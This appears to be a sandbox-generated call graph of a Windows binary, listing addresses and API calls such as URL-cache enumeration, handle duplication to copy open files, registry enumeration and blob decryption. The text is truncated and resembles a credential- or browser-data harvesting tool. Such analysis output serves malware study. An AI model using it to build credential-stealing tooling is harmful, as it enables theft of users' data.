38786->38791 38787 4453f3 38789 40aebe FindClose 38787->38789 38788 40add4 2 API calls 38788->38791 38790 4453fe 38789->38790 38790->38451 38791->38786 38791->38787 38791->38788 38792 445403 253 API calls 38791->38792 38792->38791 38794 40ae7b FindNextFileW 38793->38794 38795 40ae5c FindFirstFileW 38793->38795 38796 40ae94 38794->38796 38797 40ae8f 38794->38797 38795->38796 38798 40aeb6 38796->38798 38799 409d1f 6 API calls 38796->38799 38800 40aebe FindClose 38797->38800 38798->38451 38799->38798 38800->38796 38801->38358 38802->38383 38803->38437 38804->38418 38805->38418 38806->38452 38808 409c89 38807->38808 38808->38474 38809->38504 38811 413d39 38810->38811 38812 413d2f FreeLibrary 38810->38812 38813 40b633 free 38811->38813 38812->38811 38814 413d42 38813->38814 38815 40b633 free 38814->38815 38816 413d4a 38815->38816 38816->38331 38817->38335 38818->38386 38819->38400 38821 44db70 38820->38821 38822 40b6fc memset 38821->38822 38823 409c70 2 API calls 38822->38823 38824 40b732 wcsrchr 38823->38824 38825 40b743 38824->38825 38826 40b746 memset 38824->38826 38825->38826 38827 40b2cc 27 API calls 38826->38827 38828 40b76f 38827->38828 38829 409d1f 6 API calls 38828->38829 38830 40b783 38829->38830 39659 409b98 GetFileAttributesW 38830->39659 38832 40b792 38833 40b7c2 38832->38833 38834 409c70 2 API calls 38832->38834 39660 40bb98 38833->39660 38836 40b7a5 38834->38836 38838 40b2cc 27 API calls 38836->38838 38841 40b7b2 38838->38841 38839 40b837 CloseHandle 38843 40b83e memset 38839->38843 38840 40b817 39694 409a45 GetTempPathW 38840->39694 38845 409d1f 6 API calls 38841->38845 39693 40a6e6 WideCharToMultiByte 38843->39693 38845->38833 38846 40b827 CopyFileW 38846->38843 38847 40b866 38848 444432 121 API calls 38847->38848 38849 40b879 38848->38849 38850 40bad5 38849->38850 38851 40b273 27 API calls 38849->38851 38852 40baeb 38850->38852 38853 40bade DeleteFileW 38850->38853 38854 40b89a 38851->38854 38855 40b04b ??3@YAXPAX 38852->38855 38853->38852 38856 438552 134 API calls 38854->38856 38857 40baf3 38855->38857 38858 40b8a4 38856->38858 38857->38410 38859 40bacd 38858->38859 38861 4251c4 137 API calls 38858->38861 38860 443d90 111 API calls 38859->38860 38860->38850 38884 40b8b8 38861->38884 38862 40bac6 39706 424f26 123 API calls 38862->39706 38863 40b8bd memset 39697 425413 17 API calls 38863->39697 38866 425413 17 API calls 38866->38884 38869 40a71b MultiByteToWideChar 38869->38884 38870 40a734 MultiByteToWideChar 38870->38884 38873 40b9b5 memcmp 38873->38884 38874 4099c6 2 API calls 38874->38884 38875 404423 37 API calls 38875->38884 38877 40bb3e memset memcpy 39707 40a734 MultiByteToWideChar 38877->39707 38878 4251c4 137 API calls 38878->38884 38881 40bb88 LocalFree 38881->38884 38884->38862 38884->38863 38884->38866 38884->38869 38884->38870 38884->38873 38884->38874 38884->38875 38884->38877 38884->38878 38885 40ba5f memcmp 38884->38885 39698 4253ef 16 API calls 38884->39698 39699 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38884->39699 39700 4253af 17 API calls 38884->39700 39701 4253cf 17 API calls 38884->39701 39702 447280 memset 38884->39702 39703 447960 memset memcpy memcpy memcpy 38884->39703 39704 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38884->39704 39705 447920 memcpy memcpy memcpy 38884->39705 38885->38884 38886->38412 38888 40aed1 38887->38888 38889 40aec7 FindClose 38887->38889 38888->38344 38889->38888 38891 4099d7 38890->38891 38892 4099da memcpy 38890->38892 38891->38892 38892->38395 38894 40b2cc 27 API calls 38893->38894 38895 44543f 38894->38895 38896 409d1f 6 API calls 38895->38896 38897 44544f 38896->38897 39803 409b98 GetFileAttributesW 38897->39803 38899 44545e 38900 445476 38899->38900 38901 40b6ef 252 API calls 38899->38901 38902 40b2cc 27 API calls 38900->38902 38901->38900 38903 445482 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 445492 38904->38905 39804 409b98 GetFileAttributesW 38905->39804 38907 4454a1 38908 4454b9 38907->38908 38909 40b6ef 252 API calls 38907->38909 38908->38426 38909->38908 38910->38425 38911->38442 38912->38448 38913->38485 38914->38467 38915->38512 38916->38512 38917->38495 38918->38523 38919->38525 38920->38527 38922 414c2e 16 API calls 38921->38922 38923 40c2ae 38922->38923 38993 40c1d3 38923->38993 38928 40c3be 38945 40a8ab 38928->38945 38929 40afcf 2 API calls 38930 40c2fd FindFirstUrlCacheEntryW 38929->38930 38931 40c3b6 38930->38931 38932 40c31e wcschr 38930->38932 38933 40b04b ??3@YAXPAX 38931->38933 38934 40c331 38932->38934 38935 40c35e FindNextUrlCacheEntryW 38932->38935 38933->38928 38936 40a8ab 9 API calls 38934->38936 38935->38932 38937 40c373 GetLastError 38935->38937 38940 40c33e wcschr 38936->38940 38938 40c3ad FindCloseUrlCache 38937->38938 38939 40c37e 38937->38939 38938->38931 38941 40afcf 2 API calls 38939->38941 38940->38935 38942 40c34f 38940->38942 38943 40c391 FindNextUrlCacheEntryW 38941->38943 38944 40a8ab 9 API calls 38942->38944 38943->38932 38943->38938 38944->38935 39087 40a97a 38945->39087 38948 40a8cc 38948->38534 38949 40a8d0 7 API calls 38949->38948 39092 40b1ab free free 38950->39092 38952 40c3dd 38953 40b2cc 27 API calls 38952->38953 38954 40c3e7 38953->38954 39093 414592 RegOpenKeyExW 38954->39093 38956 40c3f4 38957 40c50e 38956->38957 38958 40c3ff 38956->38958 38972 405337 38957->38972 38959 40a9ce 4 API calls 38958->38959 38960 40c418 memset 38959->38960 39094 40aa1d 38960->39094 38963 40c471 38965 40c47a _wcsupr 38963->38965 38964 40c505 RegCloseKey 38964->38957 38966 40a8d0 7 API calls 38965->38966 38967 40c498 38966->38967 38968 40a8d0 7 API calls 38967->38968 38969 40c4ac memset 38968->38969 38970 40aa1d 38969->38970 38971 40c4e4 RegEnumValueW 38970->38971 38971->38964 38971->38965 39096 405220 38972->39096 38976 4099c6 2 API calls 38975->38976 38977 40a714 _wcslwr 38976->38977 38978 40c634 38977->38978 39153 405361 38978->39153 38981 40c65c wcslen 39156 4053b6 39 API calls 38981->39156 38982 40c71d wcslen 38982->38544 38984 40c713 39159 4053df 39 API calls 38984->39159 38985 40c677 38985->38984 39157 40538b 39 API calls 38985->39157 38988 40c6a5 38988->38984 38989 40c6a9 memset 38988->38989 38990 40c6d3 38989->38990 39158 40c589 43 API calls 38990->39158 38992->38541 38994 40ae18 9 API calls 38993->38994 39000 40c210 38994->39000 38995 40ae51 9 API calls 38995->39000 38996 40c264 38997 40aebe FindClose 38996->38997 38999 40c26f 38997->38999 38998 40add4 2 API calls 38998->39000 39005 40e5ed memset memset 38999->39005 39000->38995 39000->38996 39000->38998 39001 40c231 _wcsicmp 39000->39001 39002 40c1d3 35 API calls 39000->39002 39001->39000 39003 40c248 39001->39003 39002->39000 39018 40c084 22 API calls 39003->39018 39006 414c2e 16 API calls 39005->39006 39007 40e63f 39006->39007 39008 409d1f 6 API calls 39007->39008 39009 40e658 39008->39009 39019 409b98 GetFileAttributesW 39009->39019 39011 40e667 39012 40e680 39011->39012 39014 409d1f 6 API calls 39011->39014 39020 409b98 GetFileAttributesW 39012->39020 39014->39012 39015 40e68f 39016 40c2d8 39015->39016 39021 40e4b2 39015->39021 39016->38928 39016->38929 39018->39000 39019->39011 39020->39015 39042 40e01e 39021->39042 39023 40e593 39025 40e5b0 39023->39025 39026 40e59c DeleteFileW 39023->39026 39024 40e521 39024->39023 39065 40e175 39024->39065 39027 40b04b ??3@YAXPAX 39025->39027 39026->39025 39028 40e5bb 39027->39028 39030 40e5c4 CloseHandle 39028->39030 39031 40e5cc 39028->39031 39030->39031 39033 40b633 free 39031->39033 39032 40e573 39034 40e584 39032->39034 39035 40e57c CloseHandle 39032->39035 39036 40e5db 39033->39036 39086 40b1ab free free 39034->39086 39035->39034 39039 40b633 free 39036->39039 39038 40e540 39038->39032 39085 40e2ab 30 API calls 39038->39085 39040 40e5e3 39039->39040 39040->39016 39043 406214 22 API calls 39042->39043 39044 40e03c 39043->39044 39045 40e16b 39044->39045 39046 40dd85 75 API calls 39044->39046 39045->39024 39047 40e06b 39046->39047 39047->39045 39048 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39048 39049 40e08d OpenProcess 39048->39049 39050 40e0a4 GetCurrentProcess DuplicateHandle 39049->39050 39054 40e152 39049->39054 39051 40e0d0 GetFileSize 39050->39051 39052 40e14a CloseHandle 39050->39052 39055 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39051->39055 39052->39054 39053 40e160 39057 40b04b ??3@YAXPAX 39053->39057 39054->39053 39056 406214 22 API calls 39054->39056 39058 40e0ea 39055->39058 39056->39053 39057->39045 39059 4096dc CreateFileW 39058->39059 39060 40e0f1 CreateFileMappingW 39059->39060 39061 40e140 CloseHandle CloseHandle 39060->39061 39062 40e10b MapViewOfFile 39060->39062 39061->39052 39063 40e13b CloseHandle 39062->39063 39064 40e11f WriteFile UnmapViewOfFile 39062->39064 39063->39061 39064->39063 39066 40e18c 39065->39066 39067 406b90 11 API calls 39066->39067 39068 40e19f 39067->39068 39069 40e1a7 memset 39068->39069 39070 40e299 39068->39070 39075 40e1e8 39069->39075 39071 4069a3 ??3@YAXPAX free 39070->39071 39072 40e2a4 39071->39072 39072->39038 39073 406e8f 13 API calls 39073->39075 39074 406b53 SetFilePointerEx ReadFile 39074->39075 39075->39073 39075->39074 39076 40e283 39075->39076 39077 40dd50 _wcsicmp 39075->39077 39081 40742e 8 API calls 39075->39081 39082 40aae3 wcslen wcslen _memicmp 39075->39082 39083 40e244 _snwprintf 39075->39083 39078 40e291 39076->39078 39079 40e288 free 39076->39079 39077->39075 39080 40aa04 free 39078->39080 39079->39078 39080->39070 39081->39075 39082->39075 39084 40a8d0 7 API calls 39083->39084 39084->39075 39085->39038 39086->39023 39089 40a980 39087->39089 39088 40a8bb 39088->38948 39088->38949 39089->39088 39090 40a995 _wcsicmp 39089->39090 39091 40a99c wcscmp 39089->39091 39090->39089 39091->39089 39092->38952 39093->38956 39095 40aa23 RegEnumValueW 39094->39095 39095->38963 39095->38964 39097 405335 39096->39097 39098 40522a 39096->39098 39097->38544 39099 40b2cc 27 API calls 39098->39099 39100 405234 39099->39100 39101 40a804 8 API calls 39100->39101 39102 40523a 39101->39102 39141 40b273 39102->39141 39104 405248 _mbscpy _mbscat GetProcAddress 39105 40b273 27 API calls 39104->39105 39106 405279 39105->39106 39144 405211 GetProcAddress 39106->39144 39108 405282 39109 40b273 27 API calls 39108->39109 39110 40528f 39109->39110 39145 405211 GetProcAddress 39110->39145 39112 405298 39113 40b273 27 API calls 39112->39113 39114 4052a5 39113->39114 39146 405211 GetProcAddress 39114->39146 39116 4052ae 39117 40b273 27 API calls 39116->39117 39118 4052bb 39117->39118 39147 405211 GetProcAddress 39118->39147 39120 4052c4 39121 40b273 27 API calls 39120->39121 39122 4052d1 39121->39122 39148 405211 GetProcAddress 39122->39148 39124 4052da 39125 40b273 27 API calls 39124->39125 39126 4052e7 39125->39126 39149 405211 GetProcAddress 39126->39149 39128 4052f0 39129 40b273 27 API calls 39128->39129 39130 4052fd 39129->39130 39150 405211 GetProcAddress 39130->39150 39132 405306 39133 40b273 27 API calls 39132->39133 39134 405313 39133->39134 39151 405211 GetProcAddress 39134->39151 39136 40531c 39137 40b273 27 API calls 39136->39137 39138 405329 39137->39138 39152 405211 GetProcAddress 39138->39152 39140 405332 39140->39097 39142 40b58d 27 API calls 39141->39142 39143 40b18c 39142->39143 39143->39104 39144->39108 39145->39112 39146->39116 39147->39120 39148->39124 39149->39128 39150->39132 39151->39136 39152->39140 39154 405220 39 API calls 39153->39154 39155 405369 39154->39155 39155->38981 39155->38982 39156->38985 39157->38988 39158->38984 39159->38982 39161 40440c FreeLibrary 39160->39161 39162 40436d 39161->39162 39163 40a804 8 API calls 39162->39163 39164 404377 39163->39164 39165 404383 39164->39165 39166 404405 39164->39166 39167 40b273 27 API calls 39165->39167 39166->38553 39166->38555 39166->38556 39168 40438d GetProcAddress 39167->39168 39169 40b273 27 API calls 39168->39169 39170 4043a7 GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ba GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043ce GetProcAddress 39173->39174 39175 40b273 27 API calls 39174->39175 39176 4043e2 GetProcAddress 39175->39176 39177 4043f1 39176->39177 39178 4043f7 39177->39178 39179 40440c FreeLibrary 39177->39179 39178->39166 39179->39166 39181 404413 FreeLibrary 39180->39181 39182 40441e 39180->39182 39181->39182 39182->38570 39183->38562 39185 40442e 39184->39185 39186 40447e 39184->39186 39187 40b2cc 27 API calls 39185->39187 39186->38562 39188 404438 39187->39188 39189 40a804 8 API calls 39188->39189 39190 40443e 39189->39190 39191 404445 39190->39191 39192 404467 39190->39192 39193 40b273 27 API calls 39191->39193 39192->39186 39194 404475 FreeLibrary 39192->39194 39195 40444f GetProcAddress 39193->39195 39194->39186 39195->39192 39196 404460 39195->39196 39196->39192 39198 4135f6 39197->39198 39199 4135eb FreeLibrary 39197->39199 39198->38573 39199->39198 39201 4449c4 39200->39201 39202 444a52 39200->39202 39203 40b2cc 27 API calls 39201->39203 39202->38590 39202->38591 39204 4449cb 39203->39204 39205 40a804 8 API calls 39204->39205 39206 4449d1 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4449dc GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4449f3 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a04 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a15 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a26 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a37 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a48 GetProcAddress 39219->39220 39220->39202 39221->38601 39222->38601 39223->38601 39224->38601 39225->38592 39227 403a29 39226->39227 39241 403bed memset memset 39227->39241 39229 403ae7 39254 40b1ab free free 39229->39254 39230 403a3f memset 39236 403a2f 39230->39236 39232 403aef 39232->38608 39233 409b98 GetFileAttributesW 39233->39236 39234 40a8d0 7 API calls 39234->39236 39235 409d1f 6 API calls 39235->39236 39236->39229 39236->39230 39236->39233 39236->39234 39236->39235 39238 40a051 GetFileTime CloseHandle 39237->39238 39239 4039ca CompareFileTime 39237->39239 39238->39239 39239->38608 39240->38609 39242 414c2e 16 API calls 39241->39242 39243 403c38 39242->39243 39244 409719 2 API calls 39243->39244 39245 403c3f wcscat 39244->39245 39246 414c2e 16 API calls 39245->39246 39247 403c61 39246->39247 39248 409719 2 API calls 39247->39248 39249 403c68 wcscat 39248->39249 39255 403af5 39249->39255 39252 403af5 20 API calls 39253 403c95 39252->39253 39253->39236 39254->39232 39256 403b02 39255->39256 39257 40ae18 9 API calls 39256->39257 39265 403b37 39257->39265 39258 403bdb 39260 40aebe FindClose 39258->39260 39259 40add4 wcscmp wcscmp 39259->39265 39261 403be6 39260->39261 39261->39252 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39258 39265->39259 39265->39262 39265->39263 39265->39264 39266 40a8d0 7 API calls 39265->39266 39266->39265 39268 409d1f 6 API calls 39267->39268 39269 404190 39268->39269 39282 409b98 GetFileAttributesW 39269->39282 39271 40419c 39272 4041a7 6 API calls 39271->39272 39273 40435c 39271->39273 39275 40424f 39272->39275 39273->38635 39275->39273 39276 40425e memset 39275->39276 39278 409d1f 6 API calls 39275->39278 39279 40a8ab 9 API calls 39275->39279 39283 414842 39275->39283 39276->39275 39277 404296 wcscpy 39276->39277 39277->39275 39278->39275 39280 4042b6 memset memset _snwprintf wcscpy 39279->39280 39280->39275 39281->38633 39282->39271 39286 41443e 39283->39286 39285 414866 39285->39275 39287 41444b 39286->39287 39288 414451 39287->39288 39289 4144a3 GetPrivateProfileStringW 39287->39289 39290 414491 39288->39290 39291 414455 wcschr 39288->39291 39289->39285 39292 414495 WritePrivateProfileStringW 39290->39292 39291->39290 39293 414463 _snwprintf 39291->39293 39292->39285 39293->39292 39294->38639 39296 40b2cc 27 API calls 39295->39296 39297 409615 39296->39297 39298 409d1f 6 API calls 39297->39298 39299 409625 39298->39299 39324 409b98 GetFileAttributesW 39299->39324 39301 409634 39302 409648 39301->39302 39325 4091b8 memset 39301->39325 39304 40b2cc 27 API calls 39302->39304 39306 408801 39302->39306 39305 40965d 39304->39305 39307 409d1f 6 API calls 39305->39307 39306->38642 39306->38643 39308 40966d 39307->39308 39377 409b98 GetFileAttributesW 39308->39377 39310 40967c 39310->39306 39311 409681 39310->39311 39378 409529 72 API calls 39311->39378 39313 409690 39313->39306 39314->38665 39315->38642 39316->38670 39324->39301 39379 40a6e6 WideCharToMultiByte 39325->39379 39327 409202 39380 444432 39327->39380 39330 40b273 27 API calls 39331 409236 39330->39331 39426 438552 39331->39426 39334 409383 39336 40b273 27 API calls 39334->39336 39338 409399 39336->39338 39337 409254 39339 40937b 39337->39339 39447 4253cf 17 API calls 39337->39447 39340 438552 134 API calls 39338->39340 39451 424f26 123 API calls 39339->39451 39358 4093a3 39340->39358 39343 409267 39344 4094ff 39455 443d90 39344->39455 39347 4251c4 137 API calls 39347->39358 39349 409507 39357 40951d 39349->39357 39475 408f2f 77 API calls 39349->39475 39351 4093df 39454 424f26 123 API calls 39351->39454 39355 4253cf 17 API calls 39355->39358 39357->39302 39358->39344 39358->39347 39358->39351 39358->39355 39360 4093e4 39358->39360 39452 4253af 17 API calls 39360->39452 39367 4093ed 39453 4253af 17 API calls 39367->39453 39370 4093f9 39370->39351 39371 409409 memcmp 39370->39371 39371->39351 39372 409421 memcmp 39371->39372 39377->39310 39378->39313 39379->39327 39476 4438b5 39380->39476 39382 44444c 39388 409215 39382->39388 39490 415a6d 39382->39490 39384 4442e6 11 API calls 39386 44469e 39384->39386 39385 444486 39387 4444b9 memcpy 39385->39387 39425 4444a4 39385->39425 39386->39388 39390 443d90 111 API calls 39386->39390 39494 415258 39387->39494 39388->39330 39388->39357 39390->39388 39391 444524 39392 444541 39391->39392 39393 44452a 39391->39393 39497 444316 39392->39497 39394 416935 16 API calls 39393->39394 39394->39425 39397 444316 18 API calls 39398 444563 39397->39398 39399 444316 18 API calls 39398->39399 39400 44456f 39399->39400 39401 444316 18 API calls 39400->39401 39402 44457f 39401->39402 39402->39425 39511 432d4e 39402->39511 39425->39384 39564 438460 39426->39564 39428 409240 39428->39334 39429 4251c4 39428->39429 39576 424f07 39429->39576 39431 4251e4 39432 4251f7 39431->39432 39433 4251e8 39431->39433 39584 4250f8 39432->39584 39583 4446ea 11 API calls 39433->39583 39435 4251f2 39435->39337 39437 425209 39440 425249 39437->39440 39443 4250f8 127 API calls 39437->39443 39444 425287 39437->39444 39592 4384e9 135 API calls 39437->39592 39593 424f74 124 API calls 39437->39593 39440->39444 39443->39437 39447->39343 39451->39334 39452->39367 39453->39370 39454->39344 39456 443da3 39455->39456 39457 443db6 39455->39457 39600 41707a 39456->39600 39457->39349 39459 443da8 39460 443dbc 39459->39460 39461 443dac 39459->39461 39475->39357 39477 4438d0 39476->39477 39488 4438c9 39476->39488 39478 415378 memcpy memcpy 39477->39478 39479 4438d5 39478->39479 39480 4154e2 10 API calls 39479->39480 39481 443906 39479->39481 39479->39488 39480->39481 39482 443970 memset 39481->39482 39481->39488 39484 44398b 39482->39484 39483 4439a0 39485 415700 10 API calls 39483->39485 39483->39488 39484->39483 39487 41975c 10 API calls 39484->39487 39486 4439c0 39485->39486 39486->39488 39489 418981 10 API calls 39486->39489 39487->39483 39488->39382 39489->39488 39491 415a77 39490->39491 39492 415a8d 39491->39492 39493 415a7e memset 39491->39493 39492->39385 39493->39492 39495 4438b5 11 API calls 39494->39495 39496 41525d 39495->39496 39496->39391 39498 444328 39497->39498 39499 444423 39498->39499 39500 44434e 39498->39500 39501 4446ea 11 API calls 39499->39501 39502 432d4e memset memset memcpy 39500->39502 39508 444381 39501->39508 39503 44435a 39502->39503 39505 444375 39503->39505 39510 44438b 39503->39510 39504 432d4e memset memset memcpy 39506 4443ec 39504->39506 39507 416935 16 API calls 39505->39507 39506->39508 39509 416935 16 API calls 39506->39509 39507->39508 39508->39397 39509->39508 39510->39504 39512 432d65 39511->39512 39513 432d58 39511->39513 39565 41703f 11 API calls 39564->39565 39566 43847a 39565->39566 39567 43848a 39566->39567 39568 43847e 39566->39568 39570 438270 134 API calls 39567->39570 39569 4446ea 11 API calls 39568->39569 39572 438488 39569->39572 39571 4384aa 39570->39571 39571->39572 39573 424f26 123 API calls 39571->39573 39572->39428 39574 4384bb 39573->39574 39575 438270 134 API calls 39574->39575 39575->39572 39577 424f1f 39576->39577 39578 424f0c 39576->39578 39580 424eea 11 API calls 39577->39580 39579 416760 11 API calls 39578->39579 39581 424f18 39579->39581 39582 424f24 39580->39582 39581->39431 39582->39431 39583->39435 39585 425108 39584->39585 39591 42510d 39584->39591 39586 424f74 124 API calls 39585->39586 39586->39591 39587 42569b 125 API calls 39588 42516e 39587->39588 39590 415c7d 16 API calls 39588->39590 39589 425115 39589->39437 39590->39589 39591->39587 39591->39589 39592->39437 39593->39437 39601 417085 39600->39601 39602 4170ab 39600->39602 39601->39602 39603 416760 11 API calls 39601->39603 39602->39459 39604 4170a4 39603->39604 39604->39459 39643 413f4f 39616->39643 39619 413f37 K32GetModuleFileNameExW 39620 413f4a 39619->39620 39620->38701 39622 413969 wcscpy 39621->39622 39623 41396c wcschr 39621->39623 39635 413a3a 39622->39635 39623->39622 39625 41398e 39623->39625 39648 4097f7 wcslen wcslen _memicmp 39625->39648 39627 41399a 39628 4139a4 memset 39627->39628 39629 4139e6 39627->39629 39649 409dd5 GetWindowsDirectoryW wcscpy 39628->39649 39631 413a31 wcscpy 39629->39631 39632 4139ec memset 39629->39632 39631->39635 39650 409dd5 GetWindowsDirectoryW wcscpy 39632->39650 39633 4139c9 wcscpy wcscat 39633->39635 39635->38701 39636 413a11 memcpy wcscat 39636->39635 39638 413cb0 GetModuleHandleW 39637->39638 39639 413cda 39637->39639 39638->39639 39640 413cbf GetProcAddress 39638->39640 39641 413ce3 GetProcessTimes 39639->39641 39642 413cf6 39639->39642 39640->39639 39641->38705 39642->38705 39644 413f2f 39643->39644 39645 413f54 39643->39645 39644->39619 39644->39620 39646 40a804 8 API calls 39645->39646 39647 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39646->39647 39647->39644 39648->39627 39649->39633 39650->39636 39651->38726 39652->38749 39654 409cf9 GetVersionExW 39653->39654 39655 409d0a 39653->39655 39654->39655 39655->38755 39655->38760 39656->38761 39657->38764 39658->38766 39659->38832 39661 40bba5 39660->39661 39708 40cc26 39661->39708 39664 40bd4b 39736 40cc0c 39664->39736 39669 40b2cc 27 API calls 39670 40bbef 39669->39670 39729 40ccf0 39670->39729 39672 40bbf5 39672->39664 39733 40ccb4 39672->39733 39675 40cf04 17 API calls 39676 40bc2e 39675->39676 39677 40bd43 39676->39677 39678 40b2cc 27 API calls 39676->39678 39679 40cc0c 4 API calls 39677->39679 39680 40bc40 39678->39680 39679->39664 39681 40ccf0 _wcsicmp 39680->39681 39682 40bc46 39681->39682 39682->39677 39683 40bc61 memset memset WideCharToMultiByte 39682->39683 39743 40103c strlen 39683->39743 39685 40bcc0 39686 40b273 27 API calls 39685->39686 39687 40bcd0 memcmp 39686->39687 39687->39677 39688 40bce2 39687->39688 39689 404423 37 API calls 39688->39689 39690 40bd10 39689->39690 39690->39677 39691 40bd3a LocalFree 39690->39691 39692 40bd1f memcpy 39690->39692 39691->39677 39692->39691 39693->38847 39695 409a74 GetTempFileNameW 39694->39695 39696 409a66 GetWindowsDirectoryW 39694->39696 39695->38846 39696->39695 39697->38884 39698->38884 39699->38884 39700->38884 39701->38884 39702->38884 39703->38884 39704->38884 39705->38884 39706->38859 39707->38881 39744 4096c3 CreateFileW 39708->39744 39710 40cc34 39711 40cc3d GetFileSize 39710->39711 39719 40bbca 39710->39719 39712 40afcf 2 API calls 39711->39712 39713 40cc64 39712->39713 39745 40a2ef ReadFile 39713->39745 39715 40cc71 39746 40ab4a MultiByteToWideChar 39715->39746 39717 40cc95 CloseHandle 39718 40b04b ??3@YAXPAX 39717->39718 39718->39719 39719->39664 39720 40cf04 39719->39720 39721 40b633 free 39720->39721 39722 40cf14 39721->39722 39752 40b1ab free free 39722->39752 39724 40bbdd 39724->39664 39724->39669 39725 40cf1b 39725->39724 39727 40cfef 39725->39727 39753 40cd4b 39725->39753 39728 40cd4b 14 API calls 39727->39728 39728->39724 39730 40ccfd 39729->39730 39732 40cd3f 39729->39732 39731 40cd26 _wcsicmp 39730->39731 39730->39732 39731->39730 39731->39732 39732->39672 39734 40aa29 6 API calls 39733->39734 39735 40bc26 39734->39735 39735->39675 39737 40b633 free 39736->39737 39738 40cc15 39737->39738 39739 40aa04 free 39738->39739 39740 40cc1d 39739->39740 39802 40b1ab free free 39740->39802 39742 40b7d4 memset CreateFileW 39742->38839 39742->38840 39743->39685 39744->39710 39745->39715 39747 40ab93 39746->39747 39748 40ab6b 39746->39748 39747->39717 39749 40a9ce 4 API calls 39748->39749 39750 40ab74 39749->39750 39751 40ab7c MultiByteToWideChar 39750->39751 39751->39747 39752->39725 39754 40cd7b 39753->39754 39787 40aa29 39754->39787 39756 40cef5 39757 40aa04 free 39756->39757 39758 40cefd 39757->39758 39758->39725 39760 40aa29 6 API calls 39761 40ce1d 39760->39761 39762 40aa29 6 API calls 39761->39762 39763 40ce3e 39762->39763 39764 40ce6a 39763->39764 39795 40abb7 wcslen memmove 39763->39795 39765 40ce9f 39764->39765 39798 40abb7 wcslen memmove 39764->39798 39767 40a8d0 7 API calls 39765->39767 39770 40ceb5 39767->39770 39768 40ce56 39796 40aa71 wcslen 39768->39796 39776 40a8d0 7 API calls 39770->39776 39772 40ce8b 39799 40aa71 wcslen 39772->39799 39773 40ce5e 39797 40abb7 wcslen memmove 39773->39797 39779 40cecb 39776->39779 39777 40ce93 39800 40abb7 wcslen memmove 39777->39800 39801 40d00b malloc memcpy free free 39779->39801 39781 40cedd 39782 40aa04 free 39781->39782 39783 40cee5 39782->39783 39784 40aa04 free 39783->39784 39785 40ceed 39784->39785 39786 40aa04 free 39785->39786 39786->39756 39788 40aa33 39787->39788 39789 40aa63 39787->39789 39790 40aa44 39788->39790 39791 40aa38 wcslen 39788->39791 39789->39756 39789->39760 39792 40a9ce malloc memcpy free free 39790->39792 39791->39790 39793 40aa4d 39792->39793 39793->39789 39794 40aa51 memcpy 39793->39794 39794->39789 39795->39768 39796->39773 39797->39764 39798->39772 39799->39777 39800->39765 39801->39781 39802->39742 39803->38899 39804->38907 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 39814 4148b6 FindResourceW 39815 4148cf SizeofResource 39814->39815 39818 4148f9 39814->39818 39816 4148e0 LoadResource 39815->39816 39815->39818 39817 4148ee LockResource 39816->39817 39816->39818 39817->39818 37843 415304 free 39819 441b3f 39829 43a9f6 39819->39829 39821 441b61 40002 4386af memset 39821->40002 39823 44189a 39824 4418e2 39823->39824 39828 442bd4 39823->39828 39825 4418ea 39824->39825 40003 4414a9 12 API calls 39824->40003 39828->39825 40004 441409 memset 39828->40004 39830 43aa20 39829->39830 39831 43aadf 39829->39831 39830->39831 39832 43aa34 memset 39830->39832 39831->39821 39833 43aa56 39832->39833 39834 43aa4d 39832->39834 40005 43a6e7 39833->40005 40013 42c02e memset 39834->40013 39839 43aad3 40015 4169a7 11 API calls 39839->40015 39840 43aaae 39840->39831 39840->39839 39855 43aae5 39840->39855 39841 43ac18 39844 43ac47 39841->39844 40017 42bbd5 memcpy memcpy memcpy memset memcpy 39841->40017 39845 43aca8 39844->39845 40018 438eed 16 API calls 39844->40018 39848 43acd5 39845->39848 40020 4233ae 11 API calls 39845->40020 40021 423426 11 API calls 39848->40021 39849 43ac87 40019 4233c5 16 API calls 39849->40019 39853 43ace1 40022 439811 163 API calls 39853->40022 39854 43a9f6 161 API calls 39854->39855 39855->39831 39855->39841 39855->39854 40016 439bbb 22 API calls 39855->40016 39857 43acfd 39863 43ad2c 39857->39863 40023 438eed 16 API calls 39857->40023 39859 43ad19 40024 4233c5 16 API calls 39859->40024 39860 43ad58 40025 44081d 163 API calls 39860->40025 39863->39860 39866 43add9 39863->39866 39865 43ae3a memset 39867 43ae73 39865->39867 39866->39866 40029 423426 11 API calls 39866->40029 40030 42e1c0 147 API calls 39867->40030 39868 43adab 40027 438c4e 163 API calls 39868->40027 39871 43ad6c 39871->39831 39871->39868 40026 42370b memset memcpy memset 39871->40026 39872 43adcc 40028 440f84 12 API calls 39872->40028 39873 43ae96 40031 42e1c0 147 API calls 39873->40031 39877 43aea8 39878 43aec1 39877->39878 40032 42e199 147 API calls 39877->40032 39879 43af00 39878->39879 40033 42e1c0 147 API calls 39878->40033 39879->39831 39883 43af1a 39879->39883 39884 43b3d9 39879->39884 40034 438eed 16 API calls 39883->40034 39889 43b3f6 39884->39889 39893 43b4c8 39884->39893 39886 43b60f 39886->39831 40093 4393a5 17 API calls 39886->40093 39887 43af2f 40035 4233c5 16 API calls 39887->40035 40075 432878 12 API calls 39889->40075 39891 43af51 40036 423426 11 API calls 39891->40036 39899 43b4f2 39893->39899 40081 42bbd5 memcpy memcpy memcpy memset memcpy 39893->40081 39895 43af7d 40037 423426 11 API calls 39895->40037 40082 43a76c 21 API calls 39899->40082 39900 43b529 40083 44081d 163 API calls 39900->40083 39901 43b462 40077 423330 11 API calls 39901->40077 39902 43af94 40038 423330 11 API calls 39902->40038 39906 